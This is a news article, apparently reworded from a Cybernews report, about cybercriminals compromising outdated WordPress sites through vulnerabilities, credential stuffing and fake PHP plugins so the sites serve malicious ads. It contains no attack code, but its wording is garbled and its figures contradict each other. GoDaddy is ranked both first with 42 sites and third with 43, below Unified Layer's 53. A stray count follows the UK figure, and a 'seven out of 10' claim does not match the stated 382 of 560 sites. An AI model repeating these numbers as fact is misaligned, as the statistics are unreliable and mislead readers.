Cybercriminals are using phishing advertising to target old WordPress sites

WordPress sites using outdated versions of the world’s most popular content management system (CMS) are being targeted by cybercriminals who want to exploit them to serve dangerous phishing advertising.

Cybernews experts discovered this new attack approach during a normal scanning operation in December of last year. These researchers did uncover an illicit money-making operation that was used to breach hundreds of WordPress-powered sites that were either running outdated versions or did not have the necessary security plugins in place when they made their discoveries.

Cybercriminals used vulnerabilities and credential stuffing attacks to infiltrate the susceptible websites before committing the initial act of intrusion. These sites became command and control hubs for fraudulent adverts when activated by scripts executed in the second phase or by clicking on a link injected with a PHP script into the WordPress installations of the targeted sites. Cybernews discovered a surprising number of malicious PHP programmes posing as legal WordPress plugins.

When the JavaScript code was found to be suspicious, Cybernews’ Vincentas Baubonis stated how it encouraged the researchers to dig further:

As a result of significant obfuscation and strange deployment circumstances, this JavaScript code drew the attention of the team. Legitimate creators and malicious actors alike use code obfuscation to thwart attempts at reverse engineering. The real payload was reversed in order to hide dangerous code.”

Focusing on WordPress blogs that are more than a year ago

Automatic assaults against older WordPress sites were initiated after malicious PHP scripts had been disguised as genuine plugins in order to inject HTML references leading to the previously compromised command and control locations.

When this assault was originally carried out, four sites were infiltrated and used to host C&C scripts, while the second stage mostly targeted WordPress sites running older versions 3.5.1 to 4.9.1, according to Cybernews. At least 560 WordPress sites were determined to be infected, and 382 of them were compelled to execute malicious code by the publication’s research team. For the most part, hackers were unable to make money from all of the hijacked sites, either due to human error or WordPress’ built-in security features.

Just seven out of the 10 sites were determined to be displaying harmful advertisements, maybe because of technical reasons or built-in WordPress theme protection that stopped the code from executing in areas it wasn’t meant to.

The US has the most hacked websites (201), followed by France (62), Germany (51) and the United Kingdom (50). (34). In terms of web hosting services, GoDaddy came out on top with 42 websites, followed by WebsiteWelcome (30) and OVH ISP (27). Unified Layer came in second with 53 compromised sites and GoDaddy came in third with 43, according to ISP’s evaluation of the data.

The most recent article from Cybernews serves as a timely reminder of the necessity of maintaining an updated WordPress site. If you’re always forgetting to make updates to your WordPress site, you may be better off signing up for a managed WordPress solution.